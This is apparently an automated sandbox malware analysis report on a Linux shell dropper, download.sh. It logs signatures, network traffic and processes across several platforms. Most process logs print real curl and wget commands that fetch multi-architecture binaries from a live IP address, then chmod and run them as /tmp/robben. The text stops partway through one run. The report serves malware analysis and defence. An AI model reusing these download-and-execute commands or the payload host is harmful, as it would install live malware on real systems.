Malware Analysis Report

2025-01-23 14:01

Sample ID 240822-1rlyhszdld
Target download.sh
SHA256 19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902

Threat Level: Shows suspicious behavior

The file download.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-22 21:53

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:32

Platform

debian12-mipsel-20240221-en

Max time kernel

85s

Max time network

90s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-14 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-14 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-14 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-14 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:52

Platform

debian9-armhf-20240611-en

Max time kernel

84s

Max time network

85s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

memory/837-1-0xb66e8000-0xb66f9044-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

69s

Max time network

479s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
N/A 224.0.0.251:5353 udp
US 151.101.65.91:443 tcp
GB 195.181.164.19:443 tcp
US 158.51.127.106:80 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.97:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.48:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:56

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

83s

Max time network

478s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-timedated.service-w7bIMg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-timedated.service-w7bIMg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

